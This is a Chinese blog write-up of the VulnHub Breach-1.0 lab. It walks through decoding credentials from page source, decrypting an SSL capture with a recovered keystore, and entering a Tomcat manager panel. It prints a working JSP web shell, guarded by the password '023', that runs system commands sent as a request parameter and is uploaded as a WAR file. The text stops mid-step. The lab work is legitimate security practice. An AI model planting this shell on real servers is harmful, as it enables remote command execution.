VulnHub 实战靶场Breach-1.0

2024-02-13 21:44:34

相比于CTF题目，Vulnhub的靶场更贴近于实际一些，而且更加综合考察了知识。在这里记录以下打这个靶场的过程和心得。

测试环境

Kali linux IP:192.168.110.128
Breach 1.0 IP:192.168.110.140

均通过NAT模式连主机

信息搜集

先扫描开放端口，发现开了一大堆。

直接查看80端口Web服务

查看页面源码有一串字符

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

得到一串意义不明的东西
pgibbons:damnitfeel$goodtobeagang$ta

点击图片有跳转，挨个点击，发现了一个impress cms

那看到cms第一反应就是去找现成的漏洞，有跨站脚本执行和本地文件包含，但都是在admin的情况下才可以执行, 这个时候我们不妨试试之前解出的那串字符，作为账号密码。

发现可以成功，进入之后查看发现有个收件箱，里面三封邮件得到了一个关键信息，192.168.110.140/.keystore，是一个SSL证书，访问链接即可下载。

但是线索到这里暂时断了，但是网上找到一个漏洞信息

漏洞信息
ImpressCMS是一款内容管理系统。
ImpressCMS存在跨站脚本漏洞，可通过PATH_INFO传递给otifications.php, modules/system/admin/images/browser.php和modules/content/admin/content.php脚本的输入注入WEB脚本或HTML，可获得敏感信息或劫持用户会话。

虽然经一系列尝试无果，但是在访问modules/content/admin/content.php的时候，由于没有权限跳转到了这个页面

content下面有个链接

是一个流量包，那之前拿到的SSL证书就能用到了。

关键信息:http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to 'tomcat'.

查看流量包

打开流量包，直接查看没有什么有用信息

导入SSL证书，因为是tomcat服务所以端口号选择8443,

说明我们拿到的证书格式不对，需要PKCS12格式的证书。我们使用keytool查看信息，密码是tomcat

根据提示信息操作

keytool -importkeystore -srckeystore keystore -destkeystore keystore -deststoretype pkcs12

现在格式正确了

重新导入，多了一些http包

我们筛选一下http包

发现在请求一个网页，但是第一次没有成功，比较两个数据包，发现多了这一行请求。

我们也尝试访问这个页面

https://192.168.110.140:8443/_M@nag3Me/html

但是一直访问不成功，尝试抓包

才发现是觉得不安全被拦截了，抓包访问的时候会让你输入账号密码

tomcat:Tt\5D8F(#!*u=G)4m7zB

使用流量包中发现的账号密码登录

进入后台

我们进入了一个tomcat的后台界面，发现一个文件上传点，需要上传war包。

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

打包成war上传之后访问，传参